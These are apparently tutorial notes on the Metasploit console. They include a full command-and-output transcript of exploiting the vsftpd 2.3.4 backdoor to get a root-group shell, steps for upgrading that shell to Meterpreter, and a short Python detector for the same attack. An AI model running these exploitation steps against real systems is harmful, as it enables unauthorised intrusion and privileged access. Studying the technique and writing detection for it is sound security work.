Using Metasploit

https://www.metasploit.com/

- Metasploit Framework
- Metasploit Pro

Metasploit Framework Console

    $ msfconsole

Commands usable at the msf6 prompt:

- ls
- ping -c 1 127.0.0.1
- history
- back: leave the current context

Search

    msf6 > search vsftpd 2.3.4

    Matching Modules
    ================

       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Rank:
- Excellent: never crashes
- Great: auto-detects version and options
- Good: default for common cases
- Normal: depends on a specific version
- Average: difficult to exploit
- Low: < 50% success
- Manual: unstable

Module

    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

Options

    show options

set

    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 16.2.0.3

setg

Payload

    show payloads

    Compatible Payloads
    ===================

       #  Name                                   Disclosure Date  Rank    Check  Description
       -  ----                                   ---------------  ----    -----  -----------
       0  generic/custom                                          manual  No     Custom Payload
       1  generic/shell_bind_tcp                                  manual  No     Generic Command Shell, Bind TCP Inline
       2  generic/shell_reverse_tcp                               manual  No     Generic Command Shell, Reverse TCP Inline
       3  windows/x64/exec                                        manual  No     Windows x64 Execute Command
       4  windows/x64/loadlibrary                                 manual  No     Windows x64 LoadLibrary Path
       5  windows/x64/messagebox                                  manual  No     Windows MessageBox x64
       6  windows/x64/meterpreter/bind_ipv6_tcp                   manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager

Exploitation

- check
- exploit
- sessions
- background or Ctrl-Z

Listing sessions and interacting with one:

    msf6 > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information                   Connection
      --  ----  ----                     -----------                   ----------
      1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
      2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)

    msf6 > sessions -i 2
    [*] Starting interaction with 2...

Usage

    $ msfconsole
    msf6 > search vsftpd 2.3.4

    Matching Modules
    ================

       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 16.2.0.3
    RHOSTS => 16.2.0.3
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

    [*] 16.2.0.3:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 16.2.0.3:21 - USER: 331 Please specify the password.
    [+] 16.2.0.3:21 - Backdoor service has been spawned, handling...
    [+] 16.2.0.3:21 - UID: uid=2000(ftp) gid=0(root) groups=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (16.2.0.2:39279 -> 16.2.0.3:6200) at 2023-11-28 15:00:37 +0000

    id
    uid=2000(ftp) gid=0(root) groups=0(root)
    exit
    [*] 16.2.0.3 - Command shell session 1 closed.

Upgrade shell to Meterpreter 1

    Ctrl-Z
    sessions -u 1

Upgrade shell to Meterpreter 2

    Ctrl-Z
    search shell_to_meterpreter
    use post/multi/manage/shell_to_meterpreter
    show options
    sessions -l
    set SESSION 1
    run
    sessions -l
    sessions -i 2
    sysinfo
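
The Usage transcript leaves two things visible on the wire: the banner `220 (vsFTPd 2.3.4)` on port 21 and a follow-up connection from the same client to port 6200. The sketch below is an added example, not part of the original notes or of Metasploit; it flags that pair in flow records. The log format, the sample records and the 30-second window are assumptions made for the illustration.

```python
from datetime import datetime, timedelta

VULN_BANNER = "vsFTPd 2.3.4"    # banner shown in the transcript
SHELL_PORT = 6200               # port of the shell session in the transcript
WINDOW = timedelta(seconds=30)  # assumption: max gap between FTP login and shell

# Constructed flow records: "timestamp src dst dport [FTP banner]"
SAMPLE_FLOWS = """\
2023-11-28T15:00:35 16.2.0.2 16.2.0.3 21 220 (vsFTPd 2.3.4)
2023-11-28T15:00:37 16.2.0.2 16.2.0.3 6200
2023-11-28T15:02:10 16.2.0.9 16.2.0.3 21 220 (vsFTPd 2.3.4)
2023-11-28T15:04:00 16.2.0.7 16.2.0.5 21 220 (vsFTPd 3.0.5)
2023-11-28T15:04:02 16.2.0.7 16.2.0.5 6200
2023-11-28T16:30:00 16.2.0.9 16.2.0.3 6200
"""

def parse_flows(text):
    """Turn the constructed log format into time-ordered dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, *banner = line.split(maxsplit=4)
        flows.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                      "dport": int(dport), "banner": banner[0] if banner else ""})
    return sorted(flows, key=lambda f: f["ts"])

def analyse(flows):
    """Return (servers announcing the backdoored version, suspicious flow pairs)."""
    vulnerable, last_ftp, alerts = set(), {}, []
    for f in flows:
        pair = (f["src"], f["dst"])
        if f["dport"] == 21:
            last_ftp[pair] = f["ts"]
            if VULN_BANNER in f["banner"]:
                vulnerable.add(f["dst"])
        elif f["dport"] == SHELL_PORT and pair in last_ftp:
            if f["ts"] - last_ftp[pair] <= WINDOW:
                # Last field is True when the server also announced the backdoored banner
                alerts.append((f["ts"].isoformat(), *pair, f["dst"] in vulnerable))
    return sorted(vulnerable), alerts

if __name__ == "__main__":
    servers, alerts = analyse(parse_flows(SAMPLE_FLOWS))
    print("patch or remove:", servers)
    for ts, src, dst, confirmed in alerts:
        print(f"{ts} {src} -> {dst}:{SHELL_PORT} after FTP, banner match={confirmed}")
```

The banner inventory is the patching list; the paired-connection alert still fires when the banner is hidden or altered, which is why the two results are reported separately.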